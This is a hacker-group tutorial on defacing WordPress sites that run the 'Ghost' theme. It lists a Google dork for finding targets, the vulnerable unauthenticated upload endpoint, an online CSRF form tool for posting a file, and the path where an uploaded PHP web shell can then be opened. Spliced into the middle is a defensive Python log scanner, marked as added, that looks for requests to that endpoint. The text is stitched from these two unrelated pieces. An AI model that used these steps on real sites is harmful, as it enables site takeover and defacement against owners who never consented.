Deface Method: WordPress Themes Ghost



###############################################################

#Title: Deface Method: WordPress Themes Ghost
#Author: ./M4RY_PR0S4
#Tested on : Windows 7
#Google Dork: inurl:/wp-content/themes/Ghost/
#Exploit : /wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php

###################################################################

#Step 1: Dorking: inurl:/wp-content/themes/Ghost/
               Pick one of the targets

#Step 2: Exploit with: /wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php

A vulnerable site usually shows an error like " {"status":"NOK", "ERR":"This file is incorect"} ", something like that

Then go straight to the online CSRF tool at -> http://www.diaperbabies123.com/wp-admin/csrf.php

Step 3: Enter the target link into the CSRF tool, for example: www.site.com/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php
Then set Post File to Filedata, then shut down the PC -_- , no, lock the target of course

Upload your favorite shell; if the shell upload succeeds, it usually looks like this

{"status":"OK","imageID":"yourshell.php","imageName":"yourshell.php","php":"\n\t\n\t\t
html File<\/div><\/td>\n\t\tyourshell.php
\n\t\t\t[Delete]<\/a>\n\t\t<\/td>\n\t<\/tr>\n"}

To access your shell, go to www.site.com/wp-content/uploads/settingsimages/yourshell.php
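
For site owners checking whether this handler has been hit, the following is an added example (not part of the original post) that scans a web server access log for POSTs to the theme's upload script and for requests to script files under `settingsimages`. It assumes common/combined log format; the function name `scan`, the extension list and the sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict

# Paths taken from the write-up above, lower-cased for comparison.
UPLOAD_ENDPOINT = "/wp-content/themes/ghost/includes/uploadify/upload_settings_image.php"
UPLOAD_DIR = "/wp-content/uploads/settingsimages/"
# Assumption: extensions a typical PHP host would hand to the interpreter.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)
# Common/combined log format: ip - - [time] "METHOD target PROTO" status size ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')


def scan(lines):
    """Return (findings, suspects): flagged requests, and client IPs that both
    POSTed to the upload handler and requested a script in the upload dir."""
    findings, seen = [], defaultdict(set)
    for lineno, line in enumerate(lines, 1):
        m = LINE.match(line)
        if not m:
            continue
        ip, method, target, status = m.groups()
        path = target.split("?", 1)[0]
        lowered = path.lower()  # compare case-insensitively
        if method == "POST" and lowered == UPLOAD_ENDPOINT:
            kind = "upload_post"
        elif lowered.startswith(UPLOAD_DIR) and SCRIPT_EXT.search(path):
            kind = "script_in_upload_dir"
        else:
            continue
        findings.append((lineno, ip, kind, path, int(status)))
        seen[ip].add(kind)
    suspects = sorted(ip for ip, kinds in seen.items() if len(kinds) == 2)
    return findings, suspects


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '198.51.100.7 - - [10/Jan/2024:10:00:01 +0000] "GET /wp-content/themes/Ghost/style.css HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/Jan/2024:10:02:11 +0000] "POST /wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php HTTP/1.1" 200 214',
    '203.0.113.9 - - [10/Jan/2024:10:02:40 +0000] "GET /wp-content/uploads/settingsimages/yourshell.php HTTP/1.1" 200 1033',
    '192.0.2.44 - - [10/Jan/2024:10:05:00 +0000] "GET /wp-content/uploads/settingsimages/logo.png HTTP/1.1" 200 8812',
    '192.0.2.50 - - [10/Jan/2024:10:06:30 +0000] "GET /wp-content/uploads/settingsimages/a.PHP5 HTTP/1.1" 404 162',
]

if __name__ == "__main__":
    findings, suspects = scan(SAMPLE)
    for finding in findings:
        print(finding)
    print("clients seen uploading and then requesting a script:", suspects)
```

A hit on either pattern is a reason to inspect the `settingsimages` directory for files that are not images.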

That's all for the tutorial from me >:( sorry if it's not very clear hehe. If you copy-paste, credit the source :3

Security Ghost All Member - ./M4RY_PR0S4

             